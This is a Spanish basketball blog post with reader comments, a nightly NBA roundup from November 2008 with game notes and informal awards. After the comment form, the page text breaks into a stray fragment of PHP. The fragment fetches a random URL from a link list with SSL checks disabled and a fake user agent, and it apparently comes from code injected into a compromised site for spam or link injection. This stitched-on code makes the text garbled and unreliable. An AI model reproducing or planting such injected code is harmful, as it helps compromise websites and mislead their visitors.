La crónica (07/11/08)

08 de November de 2008 por Jabho

Larga noche habitual de los fines de semana que revisamos a modo de conclusiones:

– El inolvidable viaje de los Spurs puede estar llegando a su fin antes de lo previsto. Les echaremos de menos pero no hay que olvidar que han sido muy grandes y ya se sabe, nunca subestimes el corazón de un campeón. Anoche perdieron ante los Heat con casi triple doble de Wade y lesión de Parker.  Suenan rumores de refuerzos. Curry concretamente. Lo siguiente debe ser jugar a la ruleta rusa.

– Los Bobcats de Brown han ganado a los Hornets de Scott y Paul. ¿Sorpresa? Si, pero menos. Ni unos ni otros han empezado como acabaron el año pasado.

– Los Knicks han ganado a unos deprimidos Wizards con Wilson Chandler titular y serio candidato a MIP del año de seguir así. Lee al banco. Huele que no acaba el año en la Gran Manzana.

– Los Hawks siguen invictos e intratables. Ganaron con claridad a unos Raptors que alternan la de cal con la de arena. Josh Smith se lesionó y Manie hizo su mejor partido Raptor, pero ni aun así. ¿Les durara la gasolina a los Hawks hasta primavera? Yo no lo creo.

– Jugaron los 12 célticos en la victoria antes los Bucks. Y eso que no hicieron mal partido. Boston está en el nivel esperado y los Bucks pues según se mire. Si se espera poco de ellos se puede decir que no han empezado mal, pero por plantilla…

– Les costó 3 cuartos y medio a los Cavs ponerse por delante de los Pacers. Luego ya no dieron opción. 21 puntos de Mo, 17 de Big Z y 18 de Verajao. Además West y Wally pasaron la decena. Y LeBron cerquita del triple doble.

Iverson llegó, jugó un buen partido y los Pistons perdieron… esta música ya la he escuchado ¿no?. Los Nets van 2-2 que no está nada mal. Y anoche recuperaron a Harris para la causa.

– Otros que no saben si suben o si bajan son los Bulls. Anoche ganaron a los Suns, con Rose consolidándose de jefe y Ben Gordon dispuesto a repetir su título de mejor 6º. Por los de Arizona muy sólo Stoudemire, Shaq no jugó y Nash como si tampoco.

– Si no habían necesitado los Jazz a Deron hasta ahora no iba a ser contra los Thunder cuando le echaran de menos a pesar de Durant y Green. Kirilenko ha pasado de reclamar mas protagonismo a jugar mejor desde el banco que de titular. Los Jazz esperan invictos la recuperación de Deron. Ojito con ellos.

Kings ganaron un duelo de candidatos a picks de loteria a los Wolves. Volvió Brad Miller, fue titular y en el banco se quedaron dos jovenes que venían haciéndolo muy bien (Thompson y Hawes). Hay que encontrar el equilibrio entre no frenar la progresión pero no ser una banda.

– Los Pistons de Iverson han perdido y los Nuggets de Billups han ganado con 6 jugadores en más de 14 puntos. Cosas de los bases. Iverson es muy bueno, pero no es un base y no sé si ayudará a que los Pistons juguen mejor. Billups, por contra, pocas dudas nos deja al respecto. En los Mavericks buen partido de Terry, Dirk y otro que roza el triple doble, quién si no, Jason Kidd.

– Los Grizzlies ganaron a los Warriors y se están dedicando a tapar muchas bocas en este incio de campeonato. La mía entre ellas. Pero hubo quién confió en ellos. Buen partido de los ositos. Los Warriors están sin Monta por sanción y lesión, Magette por lesión y sin Al “pido el traspaso” Harrington.

– Los Rockets se desquitaron de la derrota antes Porland ganando con comodidad a los Clippers. T-Mac no estuvo bien, tampoco hizo falta. Los Clippers 0 victorias por 6 victorias. al menos Baron ya empieza a carburar.

Vamos con nuestros premios:

MVP: Quizás no sea el mejor de anoche porque varios estuvieron muy bien, pero Harris venía de jugar mal y se espera mucho de él en New Jersey. Anoche 38 puntos y 5 rebotes,siendo agresivo y forzando muchas personales.

El Rookie: Anoche muy buenos partidos de una promoción de rookies que ha empezado muy bien.  Beasley y Rose estuvieron muy bien y además sus equipos ganaron. Love tambien brilló siendo titular aunque sus Wolves perdieron. Pero me quedo con el duo de Memphis. Arthur se fué a 13 puntos, 12 rebotes y 3 tapones y OJ Mayo a 20 puntos, 9 rebotes y 4 asistencias. y los Memphis ganaron y han empezado bastante bien. Culpa de ellos y de Marc sobre todo.

La sorpresa: Venía avisando en pretemporada, e incluso en el final de la pasada campaña, de su verdaderpo pontencial. Wilson Chandler jugó como titular y cumplió con creces, 17 puntos y 4 rebotes.

La decepción: Wizards y Clippers son los únicos que no han ganado, los angelinos trás 6 partidos. Los buenos, Butler y Jamison por un lado y Baron y Kaman por el otro, estuvieron bien pero su obligación es conseguir que sus equipos acaben jugando mejor y ganen partidos.

El mayor esfuerzo en vano: Para Granger y sus 33 puntos en la derrota de Indiana. No hicieron mal partido pero si los Cavs carburan están un peldaño por encima. butler acarició el premio con las yemas de los dedos, pero nos dado que su equipo está nombrado como decepción no queremos hacer leña con un jugador, Butler, que nos gusta mucho.

A falta de resúmenes y hightlights os dejamos con el mate de la noche. Jugadon de un novato de una promoción que viene pegando fuerte.

Comenta

8 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Juer, vaya tela de jornada… y más que podría haber sido, que Cleveland se las vió y se las deseó para tumbar a Indiana y Celtics iba perdiendo de bastante durante la primera parte.
    (tenéis que ver el tapón que mete Lebrón cuando Indiana se iba a poner a dos puntos en el último minuto)
    ¿cómo se hace para lograr 1asis 1rob y 1tap únicamente en 20 minutos de juego?? preguntádselo a Big Ben.

    Estuve viendo el partido de los Raptors durante la segunda parte. Qué lamentable… los Hawks manejaron el partido a su antojo y Calderón estuvo muuuy flojo. A los Raptors los vi arrastrándose y a Mitchell impotente e incapaz de cambiar nada. A los Hawks habrá que empezar a darles el beneficio de la duda, aunque tendrá que ser durante unos días sin Josh Smith. ¿quien esperaba que el banquillo lo iba a hacer tan bien?

      Citar

  2. Elio dice:
    #2

    Lo de San Antonio pinta mal, son muchos partidos malos ya. Aún falta el Manudo pero es harto improbable que Parker, Duncan y Manu puedan volver a ganar un anillo o tan siquiera llegar a Final de Conferencia… A lo mejor me estoy precipitando pero… doctor, el enfermo tiene mala pinta.

      Citar

  3. xapa_croack dice:
    #3

    Los SA pintan mal, y mas ayer sin parker, veremos si para cuando vuelva manudo ya es demasiado tarde.

      Citar

  4. Viva_Dirk dice:
    #4

    Los Hawks con Bibby a buen nivel son peligrosísimos, porque el resto de jugadores son bastante consistentes en lo suyo y Marvin tiene que ganarse un contrato para este verano.

    En Memphis si los rookies se confirman como lo están haciendo, se convierten en un destino de lo mas atractivo para algun gran agente libre.

      Citar

  5. Javi dice:
    #5

    A ver primeras impresiones: Empiezo Con Portland. Me gusta. Es un equipo que defiende muy bien. Los jugadores que mas me gustaron fueron sobre todo, Lamarcus Aldridge y Brandon Roy. Rudy Fernandez estuvo fantástico. Y, como siga así, va a jugar muchos minutos, aunque no sé si va a poder estar a un nivel tan alto toda la temporada. El futuro de Sergio en Portland, parece similar al de McCaín en el partido Republicano. Es decir lo veo muy negro. Por dos razones: Queda claro de una vez que a Mcmillan Rudy no le gusta. Y en segundo lugar, El estilo de juego de Mcmillan, no es el estilo de Sergío, más acostumbrado a un juego creativo
    y de ritmo vertiginoso. Conclusión: ¿Hay por ahí algún ojeador de los Knicks que lo quiera? Con esto creo que lo digo todo. D”antony se lo pasaría en grande con Sergio y Sergio con el estilo de D”antony. además, seguro que tal y como esta NY, jugaría mucho más. En cuanto a Toronto, pues, como diría Chiquito de la Calzada , gran poeta urbano: Una mala noche la tiene cualquiera. Los Hawks fueron muy agresivos en defensa y en ataque y Los Raptors, exceptuando a Bosh Y Calderón se fueron de Party. No estoy de acuerdo con la apreciación sobre los Hawks que me parecen un equipo muy sólido y que sabe a lo que juega. Me gustan tanto los titulares como los que salen desde el banco. Creo que llegaran lejos.

      Citar

  6. Fran Reyes dice:
    #6

    @ JAVI

    +1. New York podría ser un buen destino para Sergio, aunque creo que con Chris Duhon y Nate Robinson está cubierto su perfil de base.

    Por otro lado, ya se sabe cómo es Allen Iverson. Es un hombre que sólo necesita reboteadores en su equipo, incluso Prince le sobra en Detroit. Mientras Iverson juega en Detroit, Billups hace jugar en Denver. Ley de vida.

      Citar

  7. Jabho dice:
    #7

    Yo también vi a lo Hawks muy bien. Demasiado para estar dónde estamos. Es un equipo que no ataca bien en estático y que juega a correr mucho. Muy físicos y por eso dudo que puedan mantener esta intensidad toda la liga.

    Respecto al banco como decis mejor de lo esperado. Law y Murray dan buenos relevos por fuera. Evans aporta musculo e intensidad. Y Zaza, Jones y Morris pues aportan cositas por dentro.

    Lo dicho, dudo que mantengan este nivel pero porque van invictos y ganado partidos dificles. Eso si, estarán seguro en PO y creo tendrán banace positivo visto lo visto.

    Los Raptors como decis una mala noche la tiene cualquiera. Si Jermaine se va enchufando son un equipo peligrosísimo. Es normal a estas alturas que seas un poco irregular y no hay porque preocuparse.

      Citar

  8. aro_pasado_no_newtoniano dice:
    #8

    Gran crónica, sí señor.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>